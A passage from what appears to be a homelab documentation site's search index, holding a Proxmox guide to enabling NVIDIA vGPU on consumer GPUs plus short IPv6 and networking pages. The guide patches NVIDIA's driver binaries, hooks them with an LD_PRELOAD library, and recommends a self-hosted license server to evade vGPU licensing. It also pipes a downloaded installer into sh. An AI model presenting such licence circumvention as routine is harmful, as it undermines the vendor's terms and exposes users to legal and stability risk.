", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#supported-cards", "title": "Supported cards", "text": "The following consumer/not-vGPU-qualified NVIDIA GPUs can be used with vGPU: - Most GPUs from the Maxwell 2.0 generation (GTX 9xx, Quadro Mxxxx, Tesla Mxx) EXCEPT the GTX 970 - All GPUs from the Pascal generation (GTX 10xx, Quadro Pxxxx, Tesla Pxx) - All GPUs from the Turing generation (GTX 16xx, RTX 20xx, Txxxx)
If you have GPUs from the Ampere and Ada Lovelace generation, you are out of luck, unless you have a vGPU qualified card from this list like the A5000 or RTX 6000 Ada. If you have one of those cards, please consult the NVIDIA documentation for help with setting it up.
!!! THIS MEANS THAT YOUR RTX 30XX or 40XX WILL NOT WORK !!!
This guide and all my tests were done on a RTX 2080 Ti which is based on the Turing architecture.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#important-notes-before-starting", "title": "Important notes before starting", "text": " This tutorial assumes you are using a clean install of Proxmox VE 8.0. If you are using Proxmox VE 8.0, you MUST use 16.x drivers. Older versions only work with pve 7 If you tried GPU-passthrough before, you absolutely MUST revert all of the steps you did to set that up. If you only have one GPU in your system with no iGPU, your local monitor will NOT give you any output anymore after the system boots up. Use SSH or a serial connection if you want terminal access to your machine. Most of the steps can be applied to other linux distributions, however I'm only covering Proxmox VE here. ", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#are-you-upgrading-from-a-previous-version-of-this-guide", "title": "Are you upgrading from a previous version of this guide?", "text": "If you are upgrading from a previous version of this guide, you should uninstall the old driver by running nvidia-uninstall
first.
Then you also have to make sure that you are using the latest version of vgpu_unlock-rs
, otherwise it won't work with the latest driver.
Either delete the folder /opt/vgpu_unlock-rs
or enter the folder and run git pull
and then recompile the library again using cargo build --release
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#packages", "title": "Packages", "text": "Make sure to add the community pve repo and get rid of the enterprise repo (you can skip this step if you have a valid enterprise subscription)
echo \"deb http://download.proxmox.com/debian/pve bookworm pve-no-subscription\" >> /etc/apt/sources.list\nrm /etc/apt/sources.list.d/pve-enterprise.list\n
Update and upgrade
apt update\napt dist-upgrade\n
We need to install a few more packages like git, a compiler and some other tools.
apt install -y git build-essential dkms pve-headers mdevctl\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#git-repos-and-rust-compiler", "title": "Git repos and Rust compiler", "text": "First, clone this repo to your home folder (in this case /root/
)
git clone https://gitlab.com/polloloco/vgpu-proxmox.git\n
You also need the vgpu_unlock-rs repo
cd /opt\ngit clone https://github.com/mbilker/vgpu_unlock-rs.git\n
After that, install the rust compiler
curl https://sh.rustup.rs -sSf | sh -s -- -y --profile minimal\n
Now make the rust binaries available in your $PATH (you only have to do it the first time after installing rust)
source $HOME/.cargo/env\n
Enter the vgpu_unlock-rs
directory and compile the library. Depending on your hardware and internet connection that may take a while
cd vgpu_unlock-rs/\ncargo build --release\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#create-files-for-vgpu-unlock", "title": "Create files for vGPU unlock", "text": "The vgpu_unlock-rs library requires a few files and folders in order to work properly, lets create those
First create the folder for your vgpu unlock config and create an empty config file
mkdir /etc/vgpu_unlock\ntouch /etc/vgpu_unlock/profile_override.toml\n
Then, create folders and files for systemd to load the vgpu_unlock-rs library when starting the nvidia vgpu services
mkdir /etc/systemd/system/{nvidia-vgpud.service.d,nvidia-vgpu-mgr.service.d}\necho -e \"[Service]\\nEnvironment=LD_PRELOAD=/opt/vgpu_unlock-rs/target/release/libvgpu_unlock_rs.so\" > /etc/systemd/system/nvidia-vgpud.service.d/vgpu_unlock.conf\necho -e \"[Service]\\nEnvironment=LD_PRELOAD=/opt/vgpu_unlock-rs/target/release/libvgpu_unlock_rs.so\" > /etc/systemd/system/nvidia-vgpu-mgr.service.d/vgpu_unlock.conf\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#have-a-vgpu-supported-card-read-here", "title": "Have a vgpu supported card? Read here!", "text": "If you don't have a card like the Tesla P4, or any other gpu from this list, please continue reading at Enabling IOMMU
Disable the unlock part as doing this on a gpu that already supports vgpu, could break things as it introduces unnecessary complexity and more points of possible failure:
echo \"unlock = false\" > /etc/vgpu_unlock/config.toml\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#enabling-iommu", "title": "Enabling IOMMU", "text": "", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#note-usually-this-isnt-required-for-vgpu-to-work-but-it-doesnt-hurt-to-enable-it-you-can-skip-this-section-but-if-you-run-into-problems-later-on-make-sure-to-enable-iommu", "title": "Note: Usually this isn't required for vGPU to work, but it doesn't hurt to enable it. You can skip this section, but if you run into problems later on, make sure to enable IOMMU.", "text": "To enable IOMMU you have to enable it in your BIOS/UEFI first. Due to it being vendor specific, I am unable to provide instructions for that, but usually for Intel systems the option you are looking for is called something like \"Vt-d\", AMD systems tend to call it \"IOMMU\".
After enabling it in your BIOS/UEFI, you also have to enable it in your kernel. Depending on how your system is booting, there are two ways to do that.
If you installed your system with ZFS-on-root and in UEFI mode, then you are using systemd-boot, everything else is GRUB. GRUB is way more common so if you are unsure, you are probably using that.
Depending on which system you are using to boot, you have to chose from the following two options:
GRUB Open the file `/etc/default/grub` in your favorite editor nano /etc/default/grub\n
The kernel parameters have to be appended to the variable `GRUB_CMDLINE_LINUX_DEFAULT`. On a clean installation that line should look like this GRUB_CMDLINE_LINUX_DEFAULT=\"quiet\"\n
If you are using an Intel system, append this after `quiet`: intel_iommu=on iommu=pt\n
On AMD systems, append this after `quiet`: amd_iommu=on iommu=pt\n
The result should look like this (for intel systems): GRUB_CMDLINE_LINUX_DEFAULT=\"quiet intel_iommu=on iommu=pt\"\n
Now, save and exit from the editor using Ctrl+O and then Ctrl+X and then apply your changes: update-grub\n
systemd-boot The kernel parameters have to be appended to the commandline in the file `/etc/kernel/cmdline`, so open that in your favorite editor: nano /etc/kernel/cmdline\n
On a clean installation the file might look similar to this: root=ZFS=rpool/ROOT/pve-1 boot=zfs\n
On Intel systems, append this at the end intel_iommu=on iommu=pt\n
For AMD, use this amd_iommu=on iommu=pt\n
After editing the file, it should look similar to this root=ZFS=rpool/ROOT/pve-1 boot=zfs intel_iommu=on iommu=pt\n
Now, save and exit from the editor using Ctrl+O and then Ctrl+X and then apply your changes: proxmox-boot-tool refresh\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#loading-required-kernel-modules-and-blacklisting-the-open-source-nvidia-driver", "title": "Loading required kernel modules and blacklisting the open source nvidia driver", "text": "We have to load the vfio
, vfio_iommu_type1
, vfio_pci
and vfio_virqfd
kernel modules to get vGPU working
echo -e \"vfio\\nvfio_iommu_type1\\nvfio_pci\\nvfio_virqfd\" >> /etc/modules\n
Proxmox comes with the open source nouveau driver for nvidia gpus, however we have to use our patched nvidia driver to enable vGPU. The next line will prevent the nouveau driver from loading
echo \"blacklist nouveau\" >> /etc/modprobe.d/blacklist.conf\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#applying-our-kernel-configuration", "title": "Applying our kernel configuration", "text": "I'm not sure if this is needed, but it doesn't hurt :)
update-initramfs -u -k all\n
...and reboot
reboot\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#check-if-iommu-is-enabled", "title": "Check if IOMMU is enabled", "text": "", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#note-see-section-enabling-iommu-this-is-optional", "title": "Note: See section \"Enabling IOMMU\", this is optional", "text": "Wait for your server to restart, then type this into a root shell
dmesg | grep -e DMAR -e IOMMU\n
On my Intel system the output looks like this
[ 0.007235] ACPI: DMAR 0x000000009CC98B68 0000B8 (v01 INTEL BDW 00000001 INTL 00000001)\n[ 0.007255] ACPI: Reserving DMAR table memory at [mem 0x9cc98b68-0x9cc98c1f]\n[ 0.020766] DMAR: IOMMU enabled\n[ 0.062294] DMAR: Host address width 39\n[ 0.062296] DMAR: DRHD base: 0x000000fed90000 flags: 0x0\n[ 0.062300] DMAR: dmar0: reg_base_addr fed90000 ver 1:0 cap c0000020660462 ecap f0101a\n[ 0.062302] DMAR: DRHD base: 0x000000fed91000 flags: 0x1\n[ 0.062305] DMAR: dmar1: reg_base_addr fed91000 ver 1:0 cap d2008c20660462 ecap f010da\n[ 0.062307] DMAR: RMRR base: 0x0000009cc18000 end: 0x0000009cc25fff\n[ 0.062309] DMAR: RMRR base: 0x0000009f000000 end: 0x000000af1fffff\n[ 0.062312] DMAR-IR: IOAPIC id 8 under DRHD base 0xfed91000 IOMMU 1\n[ 0.062314] DMAR-IR: HPET id 0 under DRHD base 0xfed91000\n[ 0.062315] DMAR-IR: x2apic is disabled because BIOS sets x2apic opt out bit.\n[ 0.062316] DMAR-IR: Use 'intremap=no_x2apic_optout' to override the BIOS setting.\n[ 0.062797] DMAR-IR: Enabled IRQ remapping in xapic mode\n[ 0.302431] DMAR: No ATSR found\n[ 0.302432] DMAR: No SATC found\n[ 0.302433] DMAR: IOMMU feature pgsel_inv inconsistent\n[ 0.302435] DMAR: IOMMU feature sc_support inconsistent\n[ 0.302436] DMAR: IOMMU feature pass_through inconsistent\n[ 0.302437] DMAR: dmar0: Using Queued invalidation\n[ 0.302443] DMAR: dmar1: Using Queued invalidation\n[ 0.333474] DMAR: Intel(R) Virtualization Technology for Directed I/O\n[ 3.990175] i915 0000:00:02.0: [drm] DMAR active, disabling use of stolen memory\n
Depending on your mainboard and cpu, the output will be different, in my output the important line is the third one: DMAR: IOMMU enabled
. If you see something like that, IOMMU is enabled.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#nvidia-driver", "title": "NVIDIA Driver", "text": "This repo contains patches that allow you to use vGPU on not-qualified-vGPU cards (consumer GPUs). Those patches are binary patches, which means that each patch works ONLY for a specific driver version.
I've created patches for the following driver versions: - 16.2 (535.129.03) - Use this if you are on pve 8.0 (kernel 6.2, 6.5 should work too) - 16.1 (535.104.06) - 16.0 (535.54.06) - 15.1 (525.85.07) - 15.0 (525.60.12) - 14.4 (510.108.03) - 14.3 (510.108.03) - 14.2 (510.85.03)
You can choose which of those you want to use, but generally it's recommended to use the latest, most up-to-date version (16.2 in this case).
If you have a vGPU qualified GPU, you can use other versions too, because you don't need to patch the driver. However, you still have to make sure they are compatible with your proxmox version and kernel. Also I would not recommend using any older versions unless you have a very specific requirement.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#obtaining-the-driver", "title": "Obtaining the driver", "text": "NVIDIA doesn't let you freely download vGPU drivers like they do with GeForce or normal Quadro drivers, instead you have to download them through the NVIDIA Licensing Portal (see: https://www.nvidia.com/en-us/drivers/vgpu-software-driver/). You can sign up for a free evaluation to get access to the download page.
NB: When applying for an eval license, do NOT use your personal email or other email at a free email provider like gmail.com. You will probably have to go through manual review if you use such emails. I have very good experience using a custom domain for my email address, that way the automatic verification usually lets me in after about five minutes.
I've created a small video tutorial to find the right driver version on the NVIDIA Enterprise Portal. In the video I'm downloading the 15.0 driver, if you want a different one just replace 15.0 with the version you want:
After downloading, extract the zip file and then copy the file called NVIDIA-Linux-x86_64-DRIVERVERSION-vgpu-kvm.run
(where DRIVERVERSION is a string like 535.129.03
) from the Host_Drivers
folder to your Proxmox host into the /root/
folder using tools like FileZilla, WinSCP, scp or rsync.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#from-here-on-i-will-be-using-the-162-driver-but-the-steps-are-the-same-for-other-driver-versions", "title": "\u26a0\ufe0f From here on, I will be using the 16.2 driver, but the steps are the same for other driver versions", "text": "For example when I run a command like chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run
, you should replace 535.129.03
with the driver version you are using (if you are using a different one). You can get the list of version numbers here.
Every step where you potentially have to replace the version name will have this warning emoji next to it: \u26a0\ufe0f
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#have-a-vgpu-supported-card-read-here_1", "title": "Have a vgpu supported card? Read here!", "text": "If you don't have a card like the Tesla P4, or any other gpu from this list, please continue reading at Patching the driver
With a supported gpu, patching the driver is not needed, so you should skip the next section. You can simply install the driver package like this:
\u26a0\ufe0f
chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run\n./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run --dkms\n
To finish the installation, reboot the system
reboot\n
Now, skip the following two sections and continue at Finishing touches
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#patching-the-driver", "title": "Patching the driver", "text": "Now, on the proxmox host, make the driver executable
\u26a0\ufe0f
chmod +x NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run\n
And then patch it
\u26a0\ufe0f
./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm.run --apply-patch ~/vgpu-proxmox/535.129.03.patch\n
That should output a lot of lines ending with Self-extractible archive \"NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run\" successfully created.\n
You should now have a file called NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run
, that is your patched driver.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#installing-the-driver", "title": "Installing the driver", "text": "Now that the required patch is applied, you can install the driver
\u26a0\ufe0f
./NVIDIA-Linux-x86_64-535.129.03-vgpu-kvm-custom.run --dkms\n
The installer will ask you Would you like to register the kernel module sources with DKMS? This will allow DKMS to automatically build a new module, if you install a different kernel later.
, answer with Yes
.
Depending on your hardware, the installation could take a minute or two.
If everything went right, you will be presented with this message.
Installation of the NVIDIA Accelerated Graphics Driver for Linux-x86_64 (version: 535.129.03) is now complete.\n
Click Ok
to exit the installer.
To finish the installation, reboot.
reboot\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#finishing-touches", "title": "Finishing touches", "text": "Wait for your server to reboot, then type this into the shell to check if the driver install worked
nvidia-smi\n
You should get an output similar to this one
Tue Jan 24 20:21:28 2023\n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 525.85.07 Driver Version: 525.85.07 CUDA Version: N/A |\n|-------------------------------+----------------------+----------------------+\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|===============================+======================+======================|\n| 0 NVIDIA GeForce ... On | 00000000:01:00.0 Off | N/A |\n| 26% 33C P8 43W / 260W | 85MiB / 11264MiB | 0% Default |\n| | | N/A |\n+-------------------------------+----------------------+----------------------+\n\n+-----------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=============================================================================|\n| No running processes found |\n+-----------------------------------------------------------------------------+\n
To verify if the vGPU unlock worked, type this command
mdevctl types\n
The output will be similar to this
0000:01:00.0\n nvidia-256\n Available instances: 24\n Device API: vfio-pci\n Name: GRID RTX6000-1Q\n Description: num_heads=4, frl_config=60, framebuffer=1024M, max_resolution=5120x2880, max_instance=24\n nvidia-257\n Available instances: 12\n Device API: vfio-pci\n Name: GRID RTX6000-2Q\n Description: num_heads=4, frl_config=60, framebuffer=2048M, max_resolution=7680x4320, max_instance=12\n nvidia-258\n Available instances: 8\n Device API: vfio-pci\n Name: GRID RTX6000-3Q\n Description: num_heads=4, frl_config=60, framebuffer=3072M, max_resolution=7680x4320, max_instance=8\n---SNIP---\n
If this command doesn't return any output, vGPU unlock isn't working.
Another command you can try to see if your card is recognized as being vgpu enabled is this one:
nvidia-smi vgpu\n
If everything worked right with the unlock, the output should be similar to this:
Tue Jan 24 20:21:43 2023\n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 525.85.07 Driver Version: 525.85.07 |\n|---------------------------------+------------------------------+------------+\n| GPU Name | Bus-Id | GPU-Util |\n| vGPU ID Name | VM ID VM Name | vGPU-Util |\n|=================================+==============================+============|\n| 0 NVIDIA GeForce RTX 208... | 00000000:01:00.0 | 0% |\n+---------------------------------+------------------------------+------------+\n
However, if you get this output, then something went wrong
No supported devices in vGPU mode\n
If any of those commands give the wrong output, you cannot continue. Please make sure to read everything here very carefully and when in doubt, create an issue or join the discord server and ask for help there.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#vgpu-overrides", "title": "vGPU overrides", "text": "Further up we have created the file /etc/vgpu_unlock/profile_override.toml
and I didn't explain what it was for yet. Using that file you can override lots of parameters for your vGPU instances: For example you can change the maximum resolution, enable/disable the frame rate limiter, enable/disable support for CUDA or change the vram size of your virtual gpus.
If we take a look at the output of mdevctl types
we see lots of different types that we can choose from. However, if we for example chose GRID RTX6000-4Q
which gives us 4GB of vram in a VM, we are locked to that type for all of our VMs. Meaning we can only have 4GB VMs; it's not possible to mix different types to have one 4GB VM and two 2GB VMs.
All of that changes with the override config file. Technically we are still locked to only using one profile, but now it's possible to change the vram of the profile on a VM basis so even though we have three GRID RTX6000-4Q
instances, one VM can have 4GB of vram but we can override the vram size for the other two VMs to only 2GB.
Let's take a look at this example config override file (it's in TOML format)
[profile.nvidia-259]\nnum_displays = 1 # Max number of virtual displays. Usually 1 if you want a simple remote gaming VM\ndisplay_width = 1920 # Maximum display width in the VM\ndisplay_height = 1080 # Maximum display height in the VM\nmax_pixels = 2073600 # This is the product of display_width and display_height so 1920 * 1080 = 2073600\ncuda_enabled = 1 # Enables CUDA support. Either 1 or 0 for enabled/disabled\nfrl_enabled = 1 # This controls the frame rate limiter, if you enable it your fps in the VM get locked to 60fps. Either 1 or 0 for enabled/disabled\nframebuffer = 0x74000000\nframebuffer_reservation = 0xC000000 # In combination with the framebuffer size\n# above, these two lines will give you a VM\n# with 2GB of VRAM (framebuffer + framebuffer_reservation = VRAM size in bytes).\n# See below for some other sizes\n\n[vm.100]\nfrl_enabled = 0\n# You can override all the options from above here too. If you want to add more overrides for a new VM, just copy this block and change the VM ID\n
There are two blocks here, the first being [profile.nvidia-259]
and the second [vm.100]
. The first one applies the overrides to all VM instances of the nvidia-259
type (that's GRID RTX6000-4Q
) and the second one applies its overrides only to one specific VM, that one with the proxmox VM ID 100
.
The proxmox VM ID is the same number that you see in the proxmox webinterface, next to the VM name.
You don't have to specify all parameters, only the ones you need/want. There are some more that I didn't mention here, you can find them by going through the source code of the vgpu_unlock-rs
repo.
For a simple 1080p remote gaming VM I recommend going with something like this
[profile.nvidia-259] # choose the profile you want here\nnum_displays = 1\ndisplay_width = 1920\ndisplay_height = 1080\nmax_pixels = 2073600\n
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#important-notes", "title": "Important notes", "text": "Q profiles can give you horrible performance in OpenGL applications/games. To fix that, switch to an equivalent A or B profile (for example GRID RTX6000-4B
)
C profiles (for example GRID RTX6000-4C
) only work on Linux, don't try using those on Windows, it will not work - at all.
A profiles (for example GRID RTX6000-4A
) will NOT work on Linux, they only work on Windows.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#common-vram-sizes", "title": "Common VRAM sizes", "text": "Here are some common framebuffer sizes that you might want to use:
512MB: framebuffer = 0x1A000000\nframebuffer_reservation = 0x6000000\n
1GB: framebuffer = 0x38000000\nframebuffer_reservation = 0x8000000\n
2GB: framebuffer = 0x74000000\nframebuffer_reservation = 0xC000000\n
3GB: framebuffer = 0xB0000000\nframebuffer_reservation = 0x10000000\n
4GB: framebuffer = 0xEC000000\nframebuffer_reservation = 0x14000000\n
5GB: framebuffer = 0x128000000\nframebuffer_reservation = 0x18000000\n
6GB: framebuffer = 0x164000000\nframebuffer_reservation = 0x1C000000\n
8GB: framebuffer = 0x1DC000000\nframebuffer_reservation = 0x24000000\n
10GB: framebuffer = 0x254000000\nframebuffer_reservation = 0x2C000000\n
12GB: framebuffer = 0x2CC000000\nframebuffer_reservation = 0x34000000\n
16GB: framebuffer = 0x3BC000000\nframebuffer_reservation = 0x44000000\n
20GB: framebuffer = 0x4AC000000\nframebuffer_reservation = 0x54000000\n
24GB: framebuffer = 0x59C000000\nframebuffer_reservation = 0x64000000\n
32GB: framebuffer = 0x77C000000\nframebuffer_reservation = 0x84000000\n
48GB: framebuffer = 0xB2D200000\nframebuffer_reservation = 0xD2E00000\n
framebuffer
and framebuffer_reservation
will always equal the VRAM size in bytes when added together.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#adding-a-vgpu-to-a-proxmox-vm", "title": "Adding a vGPU to a Proxmox VM", "text": "Go to the proxmox webinterface, go to your VM, then to Hardware
, then to Add
and select PCI Device
. You should be able to choose from a list of pci devices. Choose your GPU there, its entry should say Yes
in the Mediated Devices
column.
Now you should be able to also select the MDev Type
. Choose whatever profile you want, if you don't remember which one you want, you can see the list of all available types with mdevctl types
.
Finish by clicking Add
, start the VM and install the required drivers. After installing the drivers you can shut the VM down and remove the virtual display adapter by selecting Display
in the Hardware
section and selecting none (none)
. ONLY do that if you have some other way to access the Virtual Machine like Parsec or Remote Desktop because the Proxmox Console won't work anymore.
Enjoy your new vGPU VM :)
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#licensing", "title": "Licensing", "text": "Usually a license is required to use vGPU, but luckily the community found several ways around that. Spoofing the vGPU instance to a Quadro GPU used to be very popular, but I don't recommend it anymore. I've also removed the related sections from this guide. If you still want it for whatever reason, you can go back in the commit history to find the instructions on how to use that.
The recommended way to get around the license is to set up your own license server. Follow the instructions here (or here if the other link is down).
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#common-problems", "title": "Common problems", "text": "Most problems can be solved by reading the instructions very carefully. For some very common problems, read here:
The nvidia driver won't install/load If you were using gpu passthrough before, revert ALL of the steps you did or start with a fresh proxmox installation. If you run lspci -knnd 10de:
and see vfio-pci
under Kernel driver in use:
then you have to fix that Make sure that you are using a supported kernel version (check uname -a
) My OpenGL performance is absolute garbage, what can I do? Read here mdevctl types
doesn't output anything, how to fix it? Make sure that you don't have unlock disabled if you have a consumer gpu (more information) vGPU doesn't work on my RTX 3080! What to do? Learn to read ", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#support", "title": "Support", "text": "If something isn't working, please create an issue or join the Discord server and ask for help in the #proxmox-support
channel so that the community can help you.
When asking for help, please describe your problem in detail instead of just saying \"vgpu doesn't work\". Usually a rough overview over your system (gpu, mainboard, proxmox version, kernel version, ...) and full output of dmesg
and/or journalctl --no-pager -b 0 -u nvidia-vgpu-mgr.service
(\u2190 this only after starting the VM that causes trouble) is helpful. Please also provide the output of uname -a
and cat /proc/cmdline
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#do-not-send-me-a-dm-im-not-your-personal-support", "title": "DO NOT SEND ME A DM, I'M NOT YOUR PERSONAL SUPPORT", "text": "", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#feed-my-coffee-addiction", "title": "Feed my coffee addiction \u2615", "text": "If you found this guide helpful and want to support me, please feel free to buy me a coffee. Thank you very much!
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#further-reading", "title": "Further reading", "text": "Thanks to all these people (in no particular order) for making this project possible - DualCoder for his original vgpu_unlock repo with the kernel hooks - mbilker for the rust version, vgpu_unlock-rs - KrutavShah for the wiki - HiFiPhile for the C version of vgpu unlock - rupansh for the original twelve.patch to patch the driver on kernels >= 5.12 - mbuchel#1878 on the GPU Unlocking discord for fourteen.patch to patch the driver on kernels >= 5.14 - erin-allison for the nvidia-smi wrapper script - LIL'pingu#9069 on the GPU Unlocking discord for his patch to nop out code that NVIDIA added to prevent usage of drivers with a version 460 - 470 with consumer cards
If I forgot to mention someone, please create an issue or let me know otherwise.
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#contributing", "title": "Contributing", "text": "Pull requests are welcome (factual errors, amendments, grammar/spelling mistakes etc).
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/network/disable-ipv6/", "title": "Disable IPv6 on Proxmox Permanently", "text": "By default, Proxmox IPv6 is enabled after installation. This means that the IPv6 stack is active and the host can communicate with other hosts on the same network via IPv6 protocol.
Output of ip addr
command:
You can disable IPv6 on Proxmox VE by editing the /etc/default/grub
file.
nano /etc/default/grub\n
add ipv6.disable=1
to the end of GRUB_CMDLINE_LINUX_DEFAULT
and GRUB_CMDLINE_LINUX
line. Don't change the other values at those lines.
GRUB_CMDLINE_LINUX_DEFAULT=\"ipv6.disable=1\"\nGRUB_CMDLINE_LINUX=\"ipv6.disable=1\"\n
The config should look like this:
Update the grub configuration.
update-grub\n
Save and exit. Reboot Proxmox Server to apply the changes.
Output of ip addr
command after disabling IPv6 on Proxmox VE:
", "tags": ["proxmox", "ipv6"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/", "title": "Proxmox Networking", "text": "Official Proxmox networking documentation can be found here.
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#basics", "title": "Basics", "text": "Proxmox network configuration file location/etc/network/interfaces\n
Restart proxmox network service to apply changessystemctl restart networking.service\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#example-of-multi-network-interface-server", "title": "Example of Multi Network Interface Server", "text": "The next examples will be based on the following network nics, ip addr
output:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\nlink/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1/8 scope host lo\n valid_lft forever preferred_lft forever\n2: enp7s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 18:c0:4d:00:9f:b7 brd ff:ff:ff:ff:ff:ff\n3: enp6s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 18:c0:4d:00:9f:b9 brd ff:ff:ff:ff:ff:ff\n4: enp12s0f4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq master vmbr0 state UP group default qlen 1000\nlink/ether 00:07:43:29:42:c0 brd ff:ff:ff:ff:ff:ff\n5: enp12s0f4d1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 00:07:43:29:42:c8 brd ff:ff:ff:ff:ff:ff\n6: enp12s0f4d2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 00:07:43:29:42:d0 brd ff:ff:ff:ff:ff:ff\n7: enp12s0f4d3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 00:07:43:29:42:d8 brd ff:ff:ff:ff:ff:ff\n8: wlp5s0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\nlink/ether 8c:c6:81:f0:a6:9a brd ff:ff:ff:ff:ff:ff\n9: vmbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000\nlink/ether 00:07:43:29:42:c0 brd ff:ff:ff:ff:ff:ff\n inet 192.168.100.12/24 scope global vmbr0\n valid_lft forever preferred_lft forever\n
In order to identify which physical network interfaces correspond to the network interface names in Proxmox, you can follow this guide
Breakdown of the ip addr
output:
lo
is a loopback interface. enp7s0
is a 2.5G network interface. enp6s0
is a 1G network interface. enp12s0f4
is a 10G network interface. enp12s0f4d1
is a 10G network interface. enp12s0f4d2
is a 10G network interface. enp12s0f4d3
is a 10G network interface. wlp5s0
is a Wifi network interface vmbr0
is a bridge interface. The content of the /etc/network/interfaces
after fresh installation:
